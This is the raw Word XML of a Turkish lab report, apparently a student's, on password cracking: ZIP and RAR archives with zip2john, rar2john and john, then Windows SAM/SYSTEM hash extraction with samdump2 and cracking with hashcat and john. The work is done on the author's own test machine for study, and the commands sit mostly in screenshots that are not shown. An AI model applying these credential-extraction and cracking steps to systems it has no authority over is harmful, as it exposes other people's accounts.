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0F526820" w:rsidP="20228653" w:rsidRDefault="0F526820" w14:paraId="674D4DBC" w14:textId="6DF2E1CA">
      <w:pPr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tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="20228653" w:rsidR="0F52682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tr-TR"/>
        </w:rPr>
        <w:t>ZİP ŞİFRE KIRMA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0F526820" w:rsidP="20228653" w:rsidRDefault="0F526820" w14:paraId="3E79195D" w14:textId="242C9E2A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0F52682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1-</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="6B0286E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Hash Alma:</w:t>
      </w:r>
      <w:r>
        <w:br/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zip2john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aracı</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="25C2FA1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nı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kullanarak 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sifreliZip.zip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dosyasının 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değeri</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="265EBE6F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ni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çıkar</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="42A291D1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dım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ve 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hash.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="6B0286E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dosyasına kayde</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="307483A1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ttim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="16155045" w:rsidP="20228653" w:rsidRDefault="16155045" w14:paraId="0D1222D4" w14:textId="768C6067">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="16155045">
        <w:drawing>
          <wp:inline wp14:editId="0E9701DA" wp14:anchorId="0A1EF5DC">
            <wp:extent cx="5724524" cy="1057275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2147342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2419fedac41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3B586" w:rsidP="20228653" w:rsidRDefault="7383B586" w14:paraId="5E41580C" w14:textId="5A7F15CE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7383B58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2-</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="47C6C6D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Şifre Kırma:</w:t>
      </w:r>
      <w:r>
        <w:br/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john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aracı ile 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rockyou.txt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sözlüğü</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="455FB60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nü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kullan</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="2C73095F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a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rak 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brute-force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yöntemiyle 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dosyası</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="1DFBC397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nı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çöz</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="34A9E3A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düm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.</w:t>
      </w:r>
      <w:r>
        <w:br/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Elde e</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="51C1143C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ttiğim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şifre: </w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="47C6C6D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1234</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="16155045" w:rsidP="20228653" w:rsidRDefault="16155045" w14:paraId="213F2326" w14:textId="3E88B677">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="16155045">
        <w:drawing>
          <wp:inline wp14:editId="72969275" wp14:anchorId="433A2197">
            <wp:extent cx="5724524" cy="1343025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1765473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57b19826e7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815934" w:rsidP="20228653" w:rsidRDefault="6F815934" w14:paraId="4B27795B" w14:textId="5635C05D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6F8159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3-</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="363CBF1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Dosyayı Açma:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="3588E7F4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Ş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ifre</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="0E5765DD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yi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unzip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komutu</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="316B40B3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nu kullan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arak a</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="647B36A1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çtım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.</w:t>
      </w:r>
      <w:r>
        <w:br/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 çakışması</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="6B6F20B7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n diye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 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flag.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="7BAAB1D2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’yi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yeniden adlandırarak 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flag1</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="363CBF1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olarak kayde</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="2881F5DD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ttim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="16155045" w:rsidP="20228653" w:rsidRDefault="16155045" w14:paraId="0E229EE8" w14:textId="2BAF3A71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="16155045">
        <w:drawing>
          <wp:inline wp14:editId="1E0495F0" wp14:anchorId="69848E5E">
            <wp:extent cx="5724524" cy="923925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1660325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0cf0238d4a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E71072" w:rsidP="20228653" w:rsidRDefault="46E71072" w14:paraId="2DB68D48" w14:textId="5AD16E4B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46E7107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Sonuç:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="46E71072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46E71072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flag1</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="46E71072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adlı dosya</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="5AD61A4F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sı</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="46E71072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çıkarıldı ve masaüstüne kaydedildi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="2B8787B2" w14:textId="307A006D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="16155045" w:rsidP="20228653" w:rsidRDefault="16155045" w14:paraId="327494ED" w14:textId="6A1A155B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="16155045">
        <w:drawing>
          <wp:inline wp14:editId="142913BC" wp14:anchorId="3EF667A6">
            <wp:extent cx="1295467" cy="1101769"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1981451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11a7020fe47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67" cy="110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0228653" w:rsidR="4387FF38">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidR="16155045">
        <w:drawing>
          <wp:inline wp14:editId="5BEDCFE5" wp14:anchorId="3BC3F843">
            <wp:extent cx="1568516" cy="1114461"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="473244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6dee8c2bc64a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516" cy="111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1738034D" w14:textId="09867437">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="65CC3C3F" w:rsidP="20228653" w:rsidRDefault="65CC3C3F" w14:paraId="4668955E" w14:textId="0734143C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="65CC3C3F">
        <w:drawing>
          <wp:inline wp14:editId="779A38A6" wp14:anchorId="1E9EE7B1">
            <wp:extent cx="4121362" cy="1762249"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1380023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3923b5b2347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0967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76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4E64E491" w14:textId="1AC32759">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="1F2DEFC7" w:rsidP="20228653" w:rsidRDefault="1F2DEFC7" w14:paraId="6CF3760E" w14:textId="23EB0E1C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="20228653" w:rsidR="1F2DEFC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>RAR ŞİFRE KIRMA</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="1F2DEFC7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="67D060C0" w:rsidP="20228653" w:rsidRDefault="67D060C0" w14:paraId="3E364125" w14:textId="3D5075F9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="20228653" w:rsidR="67D060C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1-</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="3CDBAEA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Hash</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="3CDBAEA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 xml:space="preserve"> Alma:</w:t>
      </w:r>
      <w:r>
        <w:br/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rar2john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aracı</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="6A538447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nı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kullanarak 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sifreliRar.rar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dosyasından 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değeri</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="58395CD4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ni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çıkar</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="57223096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tıp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hash2.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="3CDBAEA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dosyasına aktar</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="766E6E84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dım.</w:t>
      </w:r>
      <w:r w:rsidR="16155045">
        <w:drawing>
          <wp:inline wp14:editId="641B4799" wp14:anchorId="5A9C143F">
            <wp:extent cx="5724524" cy="476250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1097679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1f2c1b4a1947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90389" w:rsidP="20228653" w:rsidRDefault="17290389" w14:paraId="7B874CDD" w14:textId="2AD57AE1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="20228653" w:rsidR="1729038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2-</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="7750938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Şifre Kırma:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="77509380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77509380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john</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="77509380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aracı</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="1E4D2C2F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nı</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="77509380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kullanarak rockyou.txt sözlüğü üzerinden </w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="77509380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brute-force</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="77509380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saldırısı yap</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="43D75964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tım.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="77509380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0282AE5E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Ş</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="77509380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ifre: 123</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="141A4607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456789</w:t>
      </w:r>
      <w:r w:rsidR="141A4607">
        <w:drawing>
          <wp:inline wp14:editId="673BC773" wp14:anchorId="09E3565A">
            <wp:extent cx="5724524" cy="2009775"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="582108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6f988b8faa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6767B534" w14:textId="7E8721E5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</w:p>
    <w:p w:rsidR="141A4607" w:rsidP="20228653" w:rsidRDefault="141A4607" w14:paraId="050C13AB" w14:textId="3C016189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141A46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3-Dosyayı Açma:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="141A4607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141A4607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unrar</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="141A4607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x komutu ile şifreyi kullanarak .rar dosyasının içeriğini çıkardım.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="141A4607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 çakışmasından dolayı flag.txt, flag2 ismiyle yeniden adlandırarak kaydettim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7B396C1C" w:rsidP="20228653" w:rsidRDefault="7B396C1C" w14:paraId="2EF6E487" w14:textId="74D8F2FA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7B396C1C">
        <w:drawing>
          <wp:inline wp14:editId="414D7FF5" wp14:anchorId="718D59FF">
            <wp:extent cx="5724524" cy="3038475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="86851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b40e38493c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96C1C" w:rsidP="20228653" w:rsidRDefault="7B396C1C" w14:paraId="7CB8DE88" w14:textId="2C7F0A12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7B396C1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Sonuç:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="7B396C1C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7B396C1C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flag2</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="7B396C1C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adlı dosya başarıyla çıkarıldı ve içeriği görüntülendi. Dosya içeriği:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7B396C1C" w:rsidP="20228653" w:rsidRDefault="7B396C1C" w14:paraId="1C8B11E2" w14:textId="65D608EB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7B396C1C">
        <w:drawing>
          <wp:inline wp14:editId="0D82EB09" wp14:anchorId="4734607D">
            <wp:extent cx="4115012" cy="1316678"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1321371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885c3be48e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6504"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4115012" cy="131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824B3C" w:rsidP="20228653" w:rsidRDefault="4E824B3C" w14:paraId="437B266A" w14:textId="55E0CA8A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="4E824B3C">
        <w:drawing>
          <wp:inline wp14:editId="364B8399" wp14:anchorId="0E57E39C">
            <wp:extent cx="1216086" cy="1011869"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1232126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c71aae6f12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086" cy="10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0228653" w:rsidR="4E824B3C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">         </w:t>
      </w:r>
      <w:r w:rsidR="4E824B3C">
        <w:drawing>
          <wp:inline wp14:editId="2B67265E" wp14:anchorId="6C78CE48">
            <wp:extent cx="2044805" cy="1006536"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="825592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44374c7f2c4e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10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22B51E5D" w14:textId="1235C1FD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="4580D820" w14:textId="0C8C7699">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="33E71649" w14:textId="52E4E4A5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="10389E23" w14:textId="6A736AFD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="563A11F7" w14:textId="7DC6EBF0">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7D98BD1B" w:rsidP="20228653" w:rsidRDefault="7D98BD1B" w14:paraId="74107691" w14:textId="52804242">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="20228653" w:rsidR="7D98BD1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>WİNDOWS HASH KIRMA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7D98BD1B" w:rsidP="20228653" w:rsidRDefault="7D98BD1B" w14:paraId="36FD2CB1" w14:textId="1387596E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7D98BD1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1-SAM ve SYSTEM Dosyalarının Alınması:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="7D98BD1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Kayıt defteri düzenleyicisini açarak </w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="7D98BD1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HKEY_LOCAL_MACHINE\SAM\SAM</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="7D98BD1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yoluna girdim. SAM ve SYSTEM dosyalarını dışa aktardım. Bu iki dosya, kullanıcı şifrelerinin </w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="7D98BD1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hash’lerini</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="7D98BD1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içeriyor.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="67CED997" w14:textId="4C5B47A0">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="207C05FA" w:rsidP="20228653" w:rsidRDefault="207C05FA" w14:paraId="01D86671" w14:textId="572035AE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="207C05FA">
        <w:drawing>
          <wp:inline wp14:editId="5B2B386A" wp14:anchorId="3EAD3AE2">
            <wp:extent cx="5201138" cy="3028950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1888730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47e40ee68240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138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7C05FA" w:rsidP="20228653" w:rsidRDefault="207C05FA" w14:paraId="2CEAD830" w14:textId="1C206265">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="207C05FA">
        <w:drawing>
          <wp:inline wp14:editId="393C13CC" wp14:anchorId="2103BF45">
            <wp:extent cx="5276848" cy="3037920"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1057399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13e71c6c69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48" cy="30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82148" w:rsidP="20228653" w:rsidRDefault="02F82148" w14:paraId="07D3F688" w14:textId="1228EF6C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="02F82148">
        <w:drawing>
          <wp:inline wp14:editId="10227D00" wp14:anchorId="70F77789">
            <wp:extent cx="1797142" cy="939848"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="525670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7b63df44f42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4085C1EB" w14:textId="552B308D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="02F82148" w:rsidP="20228653" w:rsidRDefault="02F82148" w14:paraId="5F304694" w14:textId="4D5A6CD8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2-Hash Çıkarma (samdump2):</w:t>
      </w:r>
      <w:r>
        <w:br/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Kali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Linux’ta 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samdump2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komutunu kullanarak bu iki dosyadan Windows kullanıcı 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hash’lerini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çıkardım. Sonuçları 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windows_hash.txt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adında bir dosyaya kaydettim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="5D128354" w14:textId="32069FDC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</w:p>
    <w:p w:rsidR="02F82148" w:rsidP="20228653" w:rsidRDefault="02F82148" w14:paraId="0B20E45F" w14:textId="0D739001">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="02F82148">
        <w:drawing>
          <wp:inline wp14:editId="6E8789F0" wp14:anchorId="7C173B91">
            <wp:extent cx="5724524" cy="447675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1505258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b08bc0edb34f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F82148">
        <w:drawing>
          <wp:inline wp14:editId="28D326E2" wp14:anchorId="736FB63C">
            <wp:extent cx="5724524" cy="1066800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="929544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1a6cf1bdf2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82148" w:rsidP="20228653" w:rsidRDefault="02F82148" w14:paraId="42CB1084" w14:textId="7E3DDD67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3-Şifre Kırma – Yöntem 1 (</w:t>
      </w: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hashcat</w:t>
      </w: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):</w:t>
      </w:r>
      <w:r>
        <w:br/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İlk olarak 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hashcat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aracıyla kırmayı denedim. LM/NTLM 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türü için -m 1000 parametresiyle rockyou.txt sözlüğünü kullandım.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02F82148" w:rsidP="20228653" w:rsidRDefault="02F82148" w14:paraId="3A67B64F" w14:textId="0C732849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02F82148">
        <w:drawing>
          <wp:inline wp14:editId="0DC2E714" wp14:anchorId="6A129238">
            <wp:extent cx="5724524" cy="2924175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="475437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71f58e3de4c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82148" w:rsidP="20228653" w:rsidRDefault="02F82148" w14:paraId="628286F9" w14:textId="3EF98BE9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4-</w:t>
      </w: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 xml:space="preserve"> Şifre Kırma – Yöntem 2 (John </w:t>
      </w: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the</w:t>
      </w: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 xml:space="preserve"> </w:t>
      </w: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Ripper</w:t>
      </w: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):</w:t>
      </w:r>
      <w:r>
        <w:br/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Alternatif olarak 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john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aracıyla da kırmayı denedim. Yine aynı sözlük listesini kullanarak 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hash’leri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çözümledim.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02F82148" w:rsidP="20228653" w:rsidRDefault="02F82148" w14:paraId="7F5AF50A" w14:textId="4B1B57D9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02F82148">
        <w:drawing>
          <wp:inline wp14:editId="09DB3BD0" wp14:anchorId="4053B211">
            <wp:extent cx="5724524" cy="2200275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2147413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d6f9712f348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82148" w:rsidP="20228653" w:rsidRDefault="02F82148" w14:paraId="5E30BC32" w14:textId="7AADD4A0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  <w:r w:rsidRPr="20228653" w:rsidR="02F8214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5-Sonuçların Görüntülenmesi:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02F82148" w:rsidP="20228653" w:rsidRDefault="02F82148" w14:paraId="75881B46" w14:textId="7E44C192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--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show</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="02F82148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komutu ile çözülen kullanıcı hesaplarını listeledim:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02F82148" w:rsidP="20228653" w:rsidRDefault="02F82148" w14:paraId="6E8AB17D" w14:textId="2AC16FA5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02F82148">
        <w:drawing>
          <wp:inline wp14:editId="3F60960C" wp14:anchorId="177872FC">
            <wp:extent cx="5724524" cy="1695450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1512313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7ef221a51f4b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87464A" w:rsidP="20228653" w:rsidRDefault="2587464A" w14:paraId="1F0DC42D" w14:textId="3A9E81FF">
      <w:pPr>
        <w:spacing w:before="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2587464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6-Elde Ettiğim Kullanıcı Bilgileri:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="2587464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Toplam 5 kullanıcının </w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="2587464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hash’i</w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="2587464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kırıldı. Bunlardan biri kendi adım olan "Hilal Öklük" kullanıcı hesabına ait şifreydi.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Ancak bazı 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hash'ler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çözüldüğü halde </w:t>
      </w:r>
      <w:r w:rsidRPr="20228653" w:rsidR="46E05E6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şifre kısmı görünmedi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, yani şifreler düz metin olarak elde edilemedi. Bu durum genellikle:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46E05E6B" w:rsidP="20228653" w:rsidRDefault="46E05E6B" w14:paraId="600C69EE" w14:textId="5AD4D97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Hash’in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potfile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'da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bulunmasına rağmen eşleşen bir şifrenin olmaması,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="46E05E6B" w:rsidP="20228653" w:rsidRDefault="46E05E6B" w14:paraId="3ED48FB3" w14:textId="06DF7E6C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</w:t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türü ile format arasında uyumsuzluk (örneğin LM yerine NT formatının tercih edilmesi gerektiği)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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gibi nedenlerden kaynaklanıyor olabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="699E802B" w14:textId="3BDC71E3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</w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="5A5ADE49" w14:textId="3ED298C0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</w:p>
    <w:p w:rsidR="46E05E6B" w:rsidP="20228653" w:rsidRDefault="46E05E6B" w14:paraId="7664213A" w14:textId="4DCDEA90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46E05E6B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LINUX HASH KIRMA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7D137385" w:rsidP="20228653" w:rsidRDefault="7D137385" w14:paraId="5BA6DED1" w14:textId="7D249BA8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1-</w:t>
      </w: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 xml:space="preserve"> Yeni Kullanıcılar Oluşturdum:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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 xml:space="preserve"> </w:t>
      </w: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testuser</w:t>
      </w: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 xml:space="preserve"> ve </w:t>
      </w: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kullanici</w:t>
      </w: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 xml:space="preserve"> adında iki kullanıcı ekledim. Her kullanıcı için güçlü olmayan şifreler belirledim (test için).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="20228653" w:rsidP="20228653" w:rsidRDefault="20228653" w14:paraId="6F058152" w14:textId="05120D1B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7D137385" w:rsidP="20228653" w:rsidRDefault="7D137385" w14:paraId="544DD465" w14:textId="1EA395D8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7D137385">
        <w:drawing>
          <wp:inline wp14:editId="25977668" wp14:anchorId="49FB5EAB">
            <wp:extent cx="5724524" cy="2800350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="502007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39de2b616a40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137385">
        <w:drawing>
          <wp:inline wp14:editId="7D7A92D7" wp14:anchorId="5FA1CBA6">
            <wp:extent cx="5724524" cy="2943225"/>
